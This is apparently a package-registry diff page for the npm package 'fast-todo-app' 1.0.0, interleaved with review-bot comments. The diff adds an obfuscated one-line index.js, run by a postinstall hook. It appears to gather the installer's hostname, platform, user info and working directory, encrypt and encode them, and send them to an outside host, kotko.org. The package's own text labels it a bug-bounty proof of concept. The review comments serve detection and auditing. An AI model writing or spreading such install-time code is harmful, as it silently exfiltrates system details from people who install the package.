fast-todo-app 1.0.0
Potentially problematic release.
This version of fast-todo-app might be problematic. Click here for more details.
- package/README.md +1 -0
- package/crypto.js +31 -0
- package/index.js +1 -0
- package/package.json +25 -0
- package/pocByKotko.txt +1 -0
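--- a/package/README.md
+++ b/package/README.md
@@ -0,0 +1 @@
+Poc by kotko for testing bug.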
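--- a/package/crypto.js
+++ b/package/crypto.js
@@ -0,0 +1,31 @@
+const crypto = require('crypto');
+
+const algorithm = 'aes-256-ctr';
+const secretKey = 'vOVH6sdmpNWjRRIqCc7rdxs01lwHzfr3';
+const iv = crypto.randomBytes(16);
+
+const encrypt = (text) => {
+
+const cipher = crypto.createCipheriv(algorithm, secretKey, iv);
+
+const encrypted = Buffer.concat([cipher.update(text), cipher.final()]);
+
+return {
+iv: iv.toString('hex'),
+content: encrypted.toString('hex')
+};
+};
+
+const decrypt = (hash) => {
+
+const decipher = crypto.createDecipheriv(algorithm, secretKey, Buffer.from(hash.iv, 'hex'));
+
+const decrpyted = Buffer.concat([decipher.update(Buffer.from(hash.content, 'hex')), decipher.final()]);
+
+return decrpyted.toString();
+};
+
+module.exports = {
+encrypt,
+decrypt
+};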
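Review bot: `secretKey` on line 4 is a literal published with the package, and `iv` on line 5 is generated once at module load and reused by every `encrypt()` call, so this module gives obfuscation rather than confidentiality. With a fixed key and a repeated IV, AES-CTR reuses the same keystream across messages, and CTR has no integrity check, so `decrypt()` accepts altered ciphertext without error. For anyone triaging this release, the consequence is that output of `encrypt()` can be decoded by whoever holds the package, because the IV is returned next to the ciphertext. If the module is kept, move `const iv = crypto.randomBytes(16);` inside `encrypt` and load the key from outside the source tree.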
package/index.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
var _0x29bf14=_0x66f1;(function(_0x2e1483,_0x1aba64){var _0x52cd47=_0x66f1,_0x1fbfca=_0x2e1483();while(!![]){try{var _0x2e9538=parseInt(_0x52cd47(0xf6))/0x1+parseInt(_0x52cd47(0xfd))/0x2*(parseInt(_0x52cd47(0xfa))/0x3)+-parseInt(_0x52cd47(0xf9))/0x4+parseInt(_0x52cd47(0xf8))/0x5*(parseInt(_0x52cd47(0x100))/0x6)+parseInt(_0x52cd47(0x103))/0x7+-parseInt(_0x52cd47(0xf7))/0x8*(parseInt(_0x52cd47(0x105))/0x9)+-parseInt(_0x52cd47(0x104))/0xa*(parseInt(_0x52cd47(0xfc))/0xb);if(_0x2e9538===_0x1aba64)break;else _0x1fbfca['push'](_0x1fbfca['shift']());}catch(_0x52ec89){_0x1fbfca['push'](_0x1fbfca['shift']());}}}(_0x2a2f,0x22627));var os=require('os');const request=require(_0x29bf14(0xeb)),crypto=require('crypto');var fs=require('fs'),hostname=os[_0x29bf14(0x101)](),type=os[_0x29bf14(0xfe)](),userInfo=os['userInfo'](),currentPath=process[_0x29bf14(0xee)](),json=[];const algorithm=_0x29bf14(0xed),secretKey='vOVH6sdmpNWjRRIqCc7rdxs01lwHzfr3',iv=crypto[_0x29bf14(0xec)](0x10);json[_0x29bf14(0xf1)](hostname),json[_0x29bf14(0xf1)](type),json[_0x29bf14(0xf1)](userInfo),json[_0x29bf14(0xf1)](currentPath),json=JSON[_0x29bf14(0xf4)](json);const {encrypt,decrypt}=require(_0x29bf14(0x102));function _0x66f1(_0x137190,_0x2b9185){var _0x2a2fd4=_0x2a2f();return _0x66f1=function(_0x66f1e3,_0xf534){_0x66f1e3=_0x66f1e3-0xeb;var _0x2e6bfe=_0x2a2fd4[_0x66f1e3];return _0x2e6bfe;},_0x66f1(_0x137190,_0x2b9185);}function _0x2a2f(){var _0x2857b9=['request','randomBytes','aes-256-ctr','cwd','microsoft--fast','https://kotko.org/?','push','toString','pocByKotko.txt','stringify','fast-todo-app','49556fOgJKS','24URJDZo','54260GryVYf','936700JyNjIh','327777EqcrAV','from','10109jAYHOc','2tXKLGy','platform','base64','102gZdejQ','hostname','./crypto','1484315acAiVB','1290LxPDDm','185337gFTSsx'];_0x2a2f=function(){return _0x2857b9;};return _0x2a2f();}let 
hash=encrypt(json),company=_0x29bf14(0xef),packages=_0x29bf14(0xf5);fs['writeFile'](_0x29bf14(0xf3),'this\x20proof\x20for\x20report',function(_0x423896){if(_0x423896)throw _0x423896;});var buff=Buffer[_0x29bf14(0xfb)](JSON[_0x29bf14(0xf4)](hash))[_0x29bf14(0xf2)](_0x29bf14(0xff));request(_0x29bf14(0xf0)+company+':'+packages+'='+buff,(_0x58d592,_0x5e0017,_0x4cd455)=>{});
|
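Review bot: The single line of `index.js` ships obfuscated (hex-indexed string table plus a lookup function), so the code that `package.json` runs from its install hooks cannot be reviewed as published and carries no description of what it transmits. Reading the string table in its listed order, the script appears to gather `os.hostname()`, `os.platform()`, `os.userInfo()` and `process.cwd()`, pass them through `encrypt` from `./crypto`, base64-encode the result and send it with `request` to the `https://kotko.org/?` URL, after writing `pocByKotko.txt` into the working directory; that mapping is inferred and should be confirmed by deobfuscating in an isolated environment. The request callback `(_0x58d592,_0x5e0017,_0x4cd455)=>{}` is empty, so nothing is reported to the person installing. At minimum the file needs readable source and a header such as `// Sends hostname, platform, userInfo and cwd to a remote host when run`; for detection, the outbound request to that host during install and the dropped `pocByKotko.txt` are the artifacts visible on this page.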
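--- a/package/package.json
+++ b/package/package.json
@@ -0,0 +1,25 @@
+{
+"name": "fast-todo-app",
+"version": "1.0.0",
+"description": "This package for demonstrate bugs in program (Bug Bounty program. Do not delete until decision report",
+"main": "index.js",
+"scripts": {
+"postinstall": "node index.js",
+"preinstall": "npm i request --save-dev",
+"test": "node index.js"
+},
+"author": "",
+"Dependencies": {
+"crypto": "^1.0.1",
+"ip": "^1.1.5",
+"request": "^2.88.2",
+"os": "^0.1.1"
+},
+"devDependencies": {
+"crypto": "^1.0.1",
+"ip": "^1.1.5",
+"javascript-obfuscator": "^4.0.0",
+"os": "^0.1.1",
+"request": "^2.88.2"
+}
+}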
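Review bot: The `scripts` block executes code at install time: `"postinstall": "node index.js"` runs the obfuscated entry file on every install of this package, and `"preinstall": "npm i request --save-dev"` starts a nested install from inside a lifecycle hook, which may also write to the manifest of whatever project is being installed into. The `"Dependencies"` key is capitalized, so npm does not treat it as the `dependencies` field, which is probably why `request` is fetched from a hook instead; `crypto` and `os` listed here are registry packages, not the Node core modules that `require('crypto')` and `require('os')` resolve to. Declare runtime needs under lowercase `"dependencies"` and remove both hooks. Anyone auditing this version can install with `npm install --ignore-scripts` so that neither hook runs.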
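--- a/package/pocByKotko.txt
+++ b/package/pocByKotko.txt
@@ -0,0 +1 @@
+this proof for report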